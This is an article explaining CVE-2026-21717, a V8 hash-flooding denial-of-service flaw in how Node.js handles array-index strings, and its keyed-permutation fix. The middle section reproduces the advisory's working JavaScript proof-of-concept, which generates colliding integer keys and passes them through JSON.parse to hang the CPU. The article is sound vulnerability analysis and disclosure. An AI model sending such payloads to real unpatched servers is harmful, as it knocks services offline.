The Optimization That Became a Security Exception: V8's Array Index HashDoS
Source: nodejs
Hash flooding as an attack class has been well understood since at least the 28C3 conference in December 2011, when Alexander Klink and Julian Wälde demonstrated that PHP, Python, Ruby, Java, ASP.NET, and Node.js all used deterministic hash functions for their internal hash tables. A few hundred kilobytes of carefully crafted input keys could push any of those runtimes into O(n²) behavior, turning a routine POST body parse into a minutes-long CPU stall. The response across the ecosystem was seeding: make hash values unpredictable by mixing in a per-process random secret, so an attacker cannot precompute collisions without knowing the seed.
V8 went through that process. General string hashing in V8 now uses seeded rapidhash, a fast non-cryptographic keyed hash function. A new process gets a fresh random seed, collisions in the string table become unpredictable, and the straightforward crafted-payload attack stops working. CVE-2026-21717, disclosed in the March 2026 Node.js security release, is the story of one code path that never got that treatment.
The Exception That Lived in the Hash Field
V8 stores a precomputed hash value in the header of every string object. For most strings, that value is a seeded hash: unpredictable without the process secret. For a specific category called array index strings, those whose content is a decimal integer between 0 and 16,777,215 (2²⁴ - 1), V8 instead stored a deterministic structural encoding:
hash_field = (length << 24) | numeric_value;
The string "1234" would always produce the same hash value, in any process, on any machine, regardless of the seed. The reason for this was not an oversight but a deliberate performance trade-off: V8’s runtime and JIT compiler use the hash field to extract the integer value directly, without re-parsing the string content. When you write arr["123"] in a tight loop, or parse a JSON object with integer keys, V8 wants to know the integer value of that key as cheaply as possible. If the hash field encodes the integer directly, a single field load and a mask gives you the answer. If the hash field were a one-way function of the integer, you would have to go back to the character data every time.
This is the recurring structure of “exception” vulnerabilities: a security control is added to the general case, a specialized case is carved out for performance reasons, and the specialized case remains unprotected.
What the Attack Looks Like
The Node.js advisory includes a concrete proof-of-concept. Because V8 uses quadratic probing for its string intern table, the probing sequence for a key with hash value h visits buckets at offsets h, h+1, h+4, h+9, … (i² steps). An attacker who knows the hash function can construct a set of array index strings that all map to the same starting bucket and that follow the same probing sequence, creating a chain that every subsequent lookup must walk in full:
const MOD = 2 ** 19;
const CHN = 2 ** 17;
const val = 1234;
const payload = [];
let j = val + MOD;
for (let i = 1; i < CHN; i++) {
payload.push(`${j}`);
j = (j + i) % MOD;
}
// Trigger string table internalization
JSON.parse(JSON.stringify({ data: payload }));
On a modern laptop, roughly 2 MB of crafted input produces around 30 seconds of CPU hang. The attack is remote, requires no authentication, and requires only that the server interns attacker-controlled integer-keyed data, which is an accurate description of any server that parses JSON with user-provided keys, or processes query parameters, or handles URL path segments.
Why SipHash Was Not the Answer
For general strings, replacing the hash function with SipHash (Aumasson and Bernstein, 2012) or another keyed PRF is the standard playbook. SipHash-1-3 is what Rust’s standard library uses for its hash maps by default. It is fast, and its output is computationally indistinguishable from random without the key.
For array index strings, using SipHash would have meant destroying the integer-extraction fast path. Every location in V8 that checks the type bits in the hash field and then extracts the integer value would have to fall back to parsing the string content from memory. The affected sites include parseInt on strings that are already classified as array indices, property access on JavaScript arrays with string keys, and the JSON parser’s key internalization routine. These are high-frequency operations in typical JavaScript workloads. The advisory reports benchmark numbers that confirm the concern: JetStream 3 showed a 0.15% regression with the final seeded solution; going back to full string re-parsing on those hot paths would be considerably worse.
The fix therefore had to satisfy three constraints simultaneously: the output must be unpredictable without the process seed, the function must be efficiently invertible given the seed, and both the forward and inverse operations must be fast enough for hot-path use.
The Bijective Permutation Solution
The solution is a 3-round xorshift-multiply construction over the 24-bit integer space. Each round applies two operations in sequence: an XOR with a right-shifted copy of the value, followed by multiplication by an odd constant modulo 2²⁴. Both operations are bijections on the 24-bit space, so their composition is a bijection, and applying three such rounds in sequence produces a keyed bijection over all 16,777,216 possible values.
// Forward (applied at string creation time)
uint32_t SeedArrayIndexValue(uint32_t value, uint32_t m[3]) {
const uint32_t kMask = (1 << 24) - 1;
const uint32_t kShift = 12;
uint32_t x = value;
x ^= x >> kShift; x = (x * m[0]) & kMask; // round 1
x ^= x >> kShift; x = (x * m[1]) & kMask; // round 2
x ^= x >> kShift; x = (x * m[2]) & kMask; // round 3
x ^= x >> kShift;
return x;
}
// Inverse (applied on the hot path to recover the integer)
uint32_t UnseedArrayIndexValue(uint32_t hash, uint32_t m_inv[3]) {
const uint32_t kMask = (1 << 24) - 1;
const uint32_t kShift = 12;
uint32_t x = hash;
x ^= x >> kShift; x = (x * m_inv[2]) & kMask; // undo round 3
x ^= x >> kShift; x = (x * m_inv[1]) & kMask; // undo round 2
x ^= x >> kShift; x = (x * m_inv[0]) & kMask; // undo round 1
x ^= x >> kShift;
return x;
}
The XOR-shift step x ^= x >> k is self-inverse: applying it twice returns the original value, because the top k bits are unchanged and you can recover the lower bits in k-bit windows. The multiply step is invertible because multiplication by an odd constant modulo 2ⁿ is a group automorphism: every odd number is coprime to any power of two, so the modular multiplicative inverse exists and can be computed by Newton’s method once at process startup.
The three multipliers are derived from V8’s existing rapidhash secret constants, truncated to 24 bits with the low bit forced to 1 to guarantee oddness. No new source of randomness is required; the process seed already exists.
How Many Rounds Are Enough
Choosing 3 rounds was an empirical decision backed by measurements using hash-prospector, a tool designed to evaluate the statistical quality of integer hash functions via the Strict Avalanche Criterion (SAC). SAC measures the degree to which each input bit flip causes each output bit to flip with probability close to 0.5. A score of 0 represents perfect diffusion; a score of 1000 represents no diffusion at all.
| Construction | SAC Bias |
|---|---|
| Identity (original encoding) | 1000.000 |
| 1-round xorshift-multiply | 446.852 |
| 2-round xorshift-multiply | 3.447 |
| 3-round xorshift-multiply | 0.50 mean (std 0.20) |
Two rounds come close to perfect diffusion on average, but the distribution over random seed choices has outliers: some seeds produce notably weak permutations with 2 rounds. Three rounds collapse the variance, producing consistently near-ideal diffusion across the full space of possible process secrets. The advisory reports a 3-round minimum bias of 0.37 and a maximum of 1.68, well within acceptable range for this use case.
The total cost of the inverse operation on the hot path is four XORs, four shifts, three multiplications, and three masks, all on 32-bit values. This is faster than a cache-miss memory access to the string’s character data, which is what the fallback would require. The benchmark impact is effectively zero: JetStream 3 shows a 0.15% delta, within measurement noise.
A Pattern Worth Tracking
The 2026 V8 fix closes a specific hole, but the structure of the problem is worth internalizing. Security controls applied to a general case frequently leave specialized fast paths untreated, because the performance justification for the fast path also justifies deferring the security work. Over time, the rest of the system gets patched incrementally until the fast path becomes an island of old behavior surrounded by protected code. This is precisely what happened here: V8 seeded general string hashing years before this vulnerability was found, and the array index encoding survived because it was both obscure in purpose and load-bearing in performance.
For Node.js developers, the practical advice is straightforward: update to the March 2026 security releases (v20.x, v22.x, v24.x, v25.x). Servers that parse user-controlled JSON with integer keys, process query parameters, or handle URL segments containing numeric strings are the most directly exposed. Production mitigations like request body size limits and rate limiting reduce the attack surface but do not eliminate it, since the advisory’s proof-of-concept fits within 2 MB and would succeed in a single request against an unpatched server.
The broader point is that HashDoS is not a solved problem as soon as you add a seed to your hash function. It is solved when every code path that builds a hash table uses that seed. Finding the exceptions is the harder part, and they tend to hide in exactly the places where someone made a reasonable performance trade-off.